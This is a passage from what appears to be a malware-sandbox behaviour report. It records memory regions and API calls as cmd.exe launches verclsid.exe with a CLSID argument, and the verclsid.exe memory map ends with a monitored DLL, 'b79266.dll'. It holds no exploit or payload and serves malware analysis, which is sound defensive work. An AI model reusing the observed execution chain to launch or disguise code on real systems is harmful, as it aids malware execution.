end_va = 0x647fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 4601
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4602
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4603
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4604
start_va = 0x650000
end_va = 0x7d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000650000"
filename = ""
Region:
id = 4605
start_va = 0x7e0000
end_va = 0x1bdffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007e0000"
filename = ""
Region:
id = 4606
start_va = 0xc0000
end_va = 0xdffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 4607
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 4608
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Thread:
id = 223
os_tid = 0x5b0
[0550.074] GetProcAddress (hModule=0x77b10000, lpProcName="SetConsoleInputExeNameW") returned 0x77b20c80
[0550.075] GetProcessHeap () returned 0x3c0000
[0550.075] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4012) returned 0x3dc610
[0550.075] GetProcessHeap () returned 0x3c0000
[0550.076] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dc610 | out: hHeap=0x3c0000) returned 1
[0550.077] _wcsicmp (_String1="start", _String2=")") returned 74
[0550.078] _wcsicmp (_String1="FOR", _String2="start") returned -13
[0550.078] _wcsicmp (_String1="FOR/?", _String2="start") returned -13
[0550.078] _wcsicmp (_String1="IF", _String2="start") returned -10
[0550.078] _wcsicmp (_String1="IF/?", _String2="start") returned -10
[0550.078] _wcsicmp (_String1="REM", _String2="start") returned -1
[0550.078] _wcsicmp (_String1="REM/?", _String2="start") returned -1
[0550.078] GetProcessHeap () returned 0x3c0000
[0550.078] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb0) returned 0x3d9e40
[0550.078] GetProcessHeap () returned 0x3c0000
[0550.078] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x1c) returned 0x3d4740
[0550.084] GetProcessHeap () returned 0x3c0000
[0550.084] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x94) returned 0x3d9f00
[0550.086] GetProcessHeap () returned 0x3c0000
[0550.086] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb0) returned 0x3d9fa0
[0550.087] _wcsicmp (_String1="Exit", _String2=")") returned 60
[0550.087] _wcsicmp (_String1="FOR", _String2="Exit") returned 1
[0550.087] _wcsicmp (_String1="FOR/?", _String2="Exit") returned 1
[0550.087] _wcsicmp (_String1="IF", _String2="Exit") returned 4
[0550.087] _wcsicmp (_String1="IF/?", _String2="Exit") returned 4
[0550.087] _wcsicmp (_String1="REM", _String2="Exit") returned 13
[0550.087] _wcsicmp (_String1="REM/?", _String2="Exit") returned 13
[0550.087] GetProcessHeap () returned 0x3c0000
[0550.087] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb0) returned 0x3da060
[0550.087] GetProcessHeap () returned 0x3c0000
[0550.087] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x1a) returned 0x3d4770
[0550.089] GetConsoleTitleW (in: lpConsoleTitle=0x20f430, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0550.090] _wcsicmp (_String1="start", _String2="DIR") returned 15
[0550.090] _wcsicmp (_String1="start", _String2="ERASE") returned 14
[0550.090] _wcsicmp (_String1="start", _String2="DEL") returned 15
[0550.090] _wcsicmp (_String1="start", _String2="TYPE") returned -1
[0550.090] _wcsicmp (_String1="start", _String2="COPY") returned 16
[0550.090] _wcsicmp (_String1="start", _String2="CD") returned 16
[0550.090] _wcsicmp (_String1="start", _String2="CHDIR") returned 16
[0550.090] _wcsicmp (_String1="start", _String2="RENAME") returned 1
[0550.090] _wcsicmp (_String1="start", _String2="REN") returned 1
[0550.090] _wcsicmp (_String1="start", _String2="ECHO") returned 14
[0550.090] _wcsicmp (_String1="start", _String2="SET") returned 15
[0550.091] _wcsicmp (_String1="start", _String2="PAUSE") returned 3
[0550.091] _wcsicmp (_String1="start", _String2="DATE") returned 15
[0550.091] _wcsicmp (_String1="start", _String2="TIME") returned -1
[0550.091] _wcsicmp (_String1="start", _String2="PROMPT") returned 3
[0550.091] _wcsicmp (_String1="start", _String2="MD") returned 6
[0550.091] _wcsicmp (_String1="start", _String2="MKDIR") returned 6
[0550.091] _wcsicmp (_String1="start", _String2="RD") returned 1
[0550.091] _wcsicmp (_String1="start", _String2="RMDIR") returned 1
[0550.091] _wcsicmp (_String1="start", _String2="PATH") returned 3
[0550.091] _wcsicmp (_String1="start", _String2="GOTO") returned 12
[0550.091] _wcsicmp (_String1="start", _String2="SHIFT") returned 12
[0550.091] _wcsicmp (_String1="start", _String2="CLS") returned 16
[0550.091] _wcsicmp (_String1="start", _String2="CALL") returned 16
[0550.091] _wcsicmp (_String1="start", _String2="VERIFY") returned -3
[0550.091] _wcsicmp (_String1="start", _String2="VER") returned -3
[0550.091] _wcsicmp (_String1="start", _String2="VOL") returned -3
[0550.091] _wcsicmp (_String1="start", _String2="EXIT") returned 14
[0550.091] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15
[0550.091] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14
[0550.091] _wcsicmp (_String1="start", _String2="TITLE") returned -1
[0550.092] _wcsicmp (_String1="start", _String2="START") returned 0
[0550.092] GetProcessHeap () returned 0x3c0000
[0550.092] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x118) returned 0x3da120
[0550.104] GetProcessHeap () returned 0x3c0000
[0550.104] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3da120, Size=0x98) returned 0x3da120
[0550.105] GetProcessHeap () returned 0x3c0000
[0550.105] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3da120) returned 0x98
[0550.107] GetProcessHeap () returned 0x3c0000
[0550.107] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xa0) returned 0x3da1d0
[0550.109] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0550.109] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0550.109] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="DIR") returned 18
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="ERASE") returned 17
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="DEL") returned 18
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="TYPE") returned 2
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="COPY") returned 19
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="CD") returned 19
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="CHDIR") returned 19
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="RENAME") returned 4
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="REN") returned 4
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="ECHO") returned 17
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="SET") returned 3
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="PAUSE") returned 6
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="DATE") returned 18
[0550.112] _wcsicmp (_String1="verclsid.exe", _String2="TIME") returned 2
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="PROMPT") returned 6
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="MD") returned 9
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="MKDIR") returned 9
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="RD") returned 4
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="RMDIR") returned 4
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="PATH") returned 6
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="GOTO") returned 15
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="SHIFT") returned 3
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="CLS") returned 19
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="CALL") returned 19
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="VERIFY") returned -6
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="VER") returned 99
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="VOL") returned -10
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="EXIT") returned 17
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="SETLOCAL") returned 3
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="ENDLOCAL") returned 17
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="TITLE") returned 2
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="START") returned 3
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="DPATH") returned 18
[0550.113] _wcsicmp (_String1="verclsid.exe", _String2="KEYS") returned 11
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="MOVE") returned 9
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="PUSHD") returned 6
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="POPD") returned 6
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="ASSOC") returned 21
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="FTYPE") returned 16
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="BREAK") returned 20
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="COLOR") returned 19
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="MKLINK") returned 9
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="FOR") returned 16
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="IF") returned 13
[0550.114] _wcsicmp (_String1="verclsid.exe", _String2="REM") returned 4
[0550.114] _wcsnicmp (_String1="verc", _String2="cmd ", _MaxCount=0x4) returned 19
[0550.115] GetProcessHeap () returned 0x3c0000
[0550.115] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x420) returned 0x3c1320
[0550.115] SetErrorMode (uMode=0x0) returned 0x0
[0550.115] SetErrorMode (uMode=0x1) returned 0x0
[0550.115] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3c1330, lpFilePart=0x1f2820 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1f2820*="system32") returned 0x13
[0550.116] SetErrorMode (uMode=0x0) returned 0x1
[0550.116] GetProcessHeap () returned 0x3c0000
[0550.116] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3c1320, Size=0x52) returned 0x3c1320
[0550.116] GetProcessHeap () returned 0x3c0000
[0550.116] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3c1320) returned 0x52
[0550.116] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a85f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0550.116] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0550.116] GetProcessHeap () returned 0x3c0000
[0550.116] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x1ce) returned 0x3c1390
[0550.116] GetProcessHeap () returned 0x3c0000
[0550.116] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x38c) returned 0x3c1570
[0550.119] GetProcessHeap () returned 0x3c0000
[0550.119] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3c1570, Size=0x1d0) returned 0x3c1570
[0550.119] GetProcessHeap () returned 0x3c0000
[0550.119] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3c1570) returned 0x1d0
[0550.119] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a85f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0550.119] GetProcessHeap () returned 0x3c0000
[0550.119] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xe8) returned 0x3da280
[0550.119] GetProcessHeap () returned 0x3c0000
[0550.120] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3da280, Size=0x7e) returned 0x3da280
[0550.120] GetProcessHeap () returned 0x3c0000
[0550.120] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3da280) returned 0x7e
[0550.120] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0550.120] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe"), fInfoLevelId=0x1, lpFindFileData=0x1f2590, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1f2590) returned 0x3d8600
[0550.120] GetProcessHeap () returned 0x3c0000
[0550.120] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x28) returned 0x3d47a0
[0550.120] FindClose (in: hFindFile=0x3d8600 | out: hFindFile=0x3d8600) returned 1
[0550.121] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
[0550.121] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
[0550.121] GetStartupInfoW (in: lpStartupInfo=0x1f2c60 | out: lpStartupInfo=0x1f2c60*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0550.121] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x1f2b38 | out: lpAttributeList=0x0, lpSize=0x1f2b38) returned 0
[0550.121] GetLastError () returned 0x7a
[0550.121] GetProcessHeap () returned 0x3c0000
[0550.121] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x48) returned 0x3d8600
[0550.121] InitializeProcThreadAttributeList (in: lpAttributeList=0x3d8600, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x1f2b38 | out: lpAttributeList=0x3d8600, lpSize=0x1f2b38) returned 1
[0550.121] UpdateProcThreadAttribute (in: lpAttributeList=0x3d8600, dwFlags=0x0, Attribute=0x60001, lpValue=0x1f2b30, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3d8600, lpPreviousValue=0x0) returned 1
[0550.121] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\verclsid.exe", lpCommandLine="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1f2b70*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x7, hStdError=0xb), lpProcessInformation=0x1f2b58 | out: lpCommandLine="verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} ", lpProcessInformation=0x1f2b58*(hProcess=0x58, hThread=0x54, dwProcessId=0x598, dwThreadId=0x564)) returned 1
[0550.129] DeleteProcThreadAttributeList (in: lpAttributeList=0x3d8600 | out: lpAttributeList=0x3d8600)
[0550.129] GetProcessHeap () returned 0x3c0000
[0550.130] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d8600 | out: hHeap=0x3c0000) returned 1
[0550.130] GetLastError () returned 0x7a
[0550.130] ResumeThread (hThread=0x54) returned 0x0
[0550.130] CloseHandle (hObject=0x54) returned 1
[0550.130] CloseHandle (hObject=0x58) returned 1
[0550.130] GetConsoleTitleW (in: lpConsoleTitle=0x20f430, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0550.131] exit (_Code=0)
Process:
id = "30"
image_name = "verclsid.exe"
filename = "c:\\windows\\system32\\verclsid.exe"
page_root = "0x6798c000"
os_pid = "0x598"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "29"
os_parent_pid = "0x5a8"
cmd_line = "verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4609
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4610
start_va = 0xf0000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 4611
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4612
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 4613
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4614
start_va = 0xff290000
end_va = 0xff296fff
monitored = 0
entry_point = 0xff291b64
region_type = mapped_file
name = "verclsid.exe"
filename = "\\Windows\\System32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe")
Region:
id = 4615
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4616
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4617
start_va = 0x7fffffd7000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 4618
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 4619
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4620
start_va = 0x40000
end_va = 0x41fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4621
start_va = 0x170000
end_va = 0x44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 4622
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4623
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4624
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4625
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4626
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4627
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4628
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4629
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 4630
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4631
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4632
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4633
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4634
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4635
start_va = 0x170000
end_va = 0x1affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 4636
start_va = 0x350000
end_va = 0x44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 4637
start_va = 0x1b0000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 4638
start_va = 0x450000
end_va = 0x5d7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000450000"
filename = ""
Region:
id = 4639
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4640
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4641
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4642
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4643
start_va = 0x5e0000
end_va = 0x760fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005e0000"
filename = ""
Region:
id = 4644
start_va = 0x770000
end_va = 0x1b6ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000770000"
filename = ""
Region:
id = 4645
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 4646
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 4647
start_va = 0x2b0000
end_va = 0x32cfff
monitored = 0
entry_point = 0x2bcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 4648
start_va = 0x2b0000
end_va = 0x32cfff
monitored = 0
entry_point = 0x2bcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 4649
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 4650
start_va = 0x7fefc4d0000
end_va = 0x7fefc525fff
monitored = 0
entry_point = 0x7fefc4dbbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 4651
start_va = 0x1b70000
end_va = 0x1cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b70000"
filename = ""
Region:
id = 4652
start_va = 0x1b70000
end_va = 0x1c4efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b70000"
filename = ""
Region:
id = 4653
start_va = 0x1c60000
end_va = 0x1cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c60000"
filename = ""
Region:
id = 4654
start_va = 0x7fefa530000
end_va = 0x7fefa586fff
monitored = 0
entry_point = 0x7fefa531118
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 4655
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 4656
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 4657
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4658
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4659
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 4660
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 4661
start_va = 0x2b0000
end_va = 0x2f2fff
monitored = 1
entry_point = 0x2d8ed0
region_type = mapped_file
name = "b79266.dll"
